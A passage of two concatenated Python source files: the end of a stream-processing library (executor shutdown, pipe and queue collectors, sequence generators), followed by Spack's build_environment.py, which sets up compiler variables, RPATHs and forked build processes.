'COMPLETED' or 'FAILED'.
"""
with self.lock:
if len(ids) > 1:
return [self._status[i] for i in ids]
else:
return self._status[ids[0]]
def close(self):
"""Signal that the executor will no longer accept job submission.
Worker threads/processes are now allowed to terminate after all
jobs have been are completed. Without a call to close(), they will
stay around forever waiting for more jobs to come.
"""
with self.lock:
if self.closed:
return
self.waitqueue.put(StopIteration)
self.closed = True
def join(self):
"""Note that the Executor must be close()'d elsewhere,
or join() will never return.
"""
self.inputfeeder_thread.join()
self.pool.join()
self.resulttracker_thread.join()
self.failuretracker_thread.join()
def shutdown(self):
"""Shut down the Executor. Suspend all waiting jobs.
Running workers will terminate after finishing their current job items.
The call will block until all workers are terminated.
"""
with self.lock:
self.pool.inqueue.put(StopIteration) # Stop the pool workers
self.waitqueue.put(StopIteration) # Stop the input_feeder
_iterqueue(self.waitqueue) >> item[-1] # Exhaust the waitqueue
self.closed = True
self.join()
def __repr__(self):
return '<Executor(%s, poolsize=%s) at %s>' % (self.pool.__class__.__name__,
self.pool.poolsize,
hex(id(self)))
#_____________________________________________________________________
# Collectors and Sorters
class PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def selrecv():
while self.inpipes:
ready, _, _ = select.select(self.inpipes, [], [])
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = selrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PCollector at %s>' % hex(id(self))
class _PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
All input pipes are polled individually. When none is ready, the
collector sleeps for a fix duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inpipes = []
self.waittime = waittime
def pollrecv():
while self.inpipes:
ready = [p for p in self.inpipes if p.poll()]
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = pollrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
if sys.platform == "win32":
PCollector = _PCollector
class QCollector(Stream):
"""Collect items from many ThreadedFeeder's or ThreadPool's.
All input queues are polled individually. When none is ready, the
collector sleeps for a fix duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inqueues = []
self.waittime = waittime
def nonemptyget():
while self.inqueues:
ready = [q for q in self.inqueues if not q.empty()]
if not ready:
time.sleep(self.waittime)
for q in ready:
item = q.get()
if item is StopIteration:
del self.inqueues[self.inqueues.index(q)]
else:
yield item
self.iterator = nonemptyget()
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
class PSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def __iter__(self):
return heapq.merge(map(_iterrecv, self.inpipes))
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
class QSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ThreadFeeder's or ThreadPool's.
"""
def __init__(self):
self.inqueues = []
def __iter__(self):
return heapq.merge(map(_iterqueue, self.inqueues))
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
#_____________________________________________________________________
# Useful generator functions
def seq(start=0, step=1):
"""An arithmetic sequence generator. Works with any type with + defined.
>>> seq(1, 0.25) >> item[:10]
[1, 1.25, 1.5, 1.75, 2.0, 2.25, 2.5, 2.75, 3.0, 3.25]
"""
def seq(a, d):
while 1:
yield a
a += d
return seq(start, step)
def gseq(ratio, initval=1):
"""A geometric sequence generator. Works with any type with * defined.
>>> from decimal import Decimal
>>> gseq(Decimal('.2')) >> item[:4]
[1, Decimal('0.2'), Decimal('0.04'), Decimal('0.008')]
"""
while 1:
yield initval
initval *= ratio
def repeatcall(func, *args):
"""Repeatedly call func(*args) and yield the result.
Useful when func(*args) returns different results, esp. randomly.
"""
return itertools.starmap(func, itertools.repeat(args))
def chaincall(func, initval):
"""Yield func(initval), func(func(initval)), etc.
>>> chaincall(lambda x: 3*x, 2) >> take(10)
Stream([2, 6, 18, 54, 162, 486, 1458, 4374, 13122, 39366])
"""
x = initval
while 1:
yield x
x = func(x)
#_____________________________________________________________________
# Useful curried versions of builtins.{max, min, reduce}
def maximum(key):
"""
Curried version of the built-in max.
>>> Stream([3, 5, 28, 42, 7]) >> maximum(lambda x: x%28)
42
"""
return lambda s: max(s, key=key)
def minimum(key):
"""
Curried version of the built-in min.
>>> Stream([[13, 52], [28, 35], [42, 6]]) >> minimum(lambda v: v[0] + v[1])
[42, 6]
"""
return lambda s: min(s, key=key)
def reduce(function, initval=None):
"""
Curried version of the built-in reduce.
>>> reduce(lambda x,y: x+y)( [1, 2, 3, 4, 5] )
15
"""
if initval is None:
return lambda s: builtins.reduce(function, s)
else:
return lambda s: builtins.reduce(function, s, initval)
#_____________________________________________________________________
# main
if __name__ == "__main__":
import doctest
if doctest.testmod()[0]:
import sys
sys.exit(1)
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
if compiler.implicit_rpaths:
implicit_rpaths = ':'.join(compiler.implicit_rpaths)
env.set('SPACK_COMPILER_IMPLICIT_RPATHS', implicit_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
jobs = spack.config.get('config:build_jobs') if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
spack_env = EnvironmentModifications()
run_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, spack_env)
set_build_environment_variables(pkg, spack_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, spack_env)
# traverse in postorder so package can use vars from its dependencies
spec = pkg.spec
for dspec in pkg.spec.traverse(order='post', root=False,
deptype=('build', 'test')):
spkg = dspec.package
set_module_variables_for_package(spkg)
# Allow dependencies to modify the module
dpkg = dspec.package
dpkg.setup_dependent_package(pkg.module, spec)
dpkg.setup_dependent_environment(spack_env, run_env, spec)
if (not dirty) and (not spack_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_environment(spack_env, run_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the spack_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(spack_env, tty.warn)
spack_env.apply_modifications()
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
